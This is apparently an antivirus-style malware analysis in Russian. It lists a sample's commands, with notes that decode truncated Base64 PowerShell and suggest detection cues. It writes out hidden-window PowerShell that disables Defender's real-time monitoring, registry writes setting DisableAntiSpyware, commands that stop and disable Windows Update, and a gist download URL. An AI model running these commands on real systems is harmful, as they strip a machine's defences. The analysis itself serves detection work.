Техническая информация
- Блокирует обновления системы (Windows Update): останавливает службу wuauserv и отключает её запуск (см. команды sc ниже)
- https://gist.githubusercontent.com/sslsecurityonline/f24b98d89d6b0c1ef7c3d24e788348de/raw/6e3cb9665c02065cc2487aa1d3228e2531636fd0/aa
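- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQAKAGMAbQBkACAALwBjACAAcgBlAGcAIABhAGQAZA...' (со скрытым окном)
  Примечание: значение -enc — это Base64 от текста в UTF-16LE. Видимая часть декодируется в «Set-MpPreference -DisableRealtimeMonitoring $true» и начало следующей строки «cmd /c reg add» (аргумент обрезан), то есть команда отключает защиту Microsoft Defender в реальном времени. Сочетание -w 1, -exec bypass и -enc в командной строке powershell.exe — полезный признак для поиска в журналах создания процессов.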
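- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -exec bypass -ec JABjAG8AbQAgAD0AIAAiAFUAdwBCAGwAQQBIAFEAQQBMAFEAQgBOAEEASABBAEEAVQBBAEIAeQBBAEcAVQBBAFoAZwBCAGwAQQBIAEkAQQBaAFEAQgB1AEEARwBNAEEAWgBRAEEAZwBBAEMAMABBAFIAQQBCAHAAQQBIAE0AQQB...
  Примечание: -ec — сокращённая запись параметра -EncodedCommand. Видимая часть декодируется в присваивание «$com = "UwBlAHQALQBN…», то есть в переменную помещается Base64-строка, начало которой совпадает с аргументом -enc предыдущей команды (вложенное кодирование). Аргумент обрезан, поэтому дальнейшие действия этого сценария по данной строке установить нельзя.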
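- '<SYSTEM32>\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  Примечание: здесь и ниже команды идут парами, по-видимому, вызов через cmd.exe /c и запущенный им процесс (reg.exe, sc.exe). Запись DisableAntiSpyware=1 в раздел политик Windows Defender — попытка отключить антивирус через групповую политику. По документации Microsoft, в актуальных версиях Windows на клиентских устройствах этот параметр игнорируется, поэтому сама запись значения остаётся индикатором для аудита реестра, но не доказывает, что защита была отключена.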
- '<SYSTEM32>\cmd.exe' /c sc stop wuauserv
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\cmd.exe' /c sc config wuauserv start= disabled
- '<SYSTEM32>\sc.exe' config wuauserv start= disabled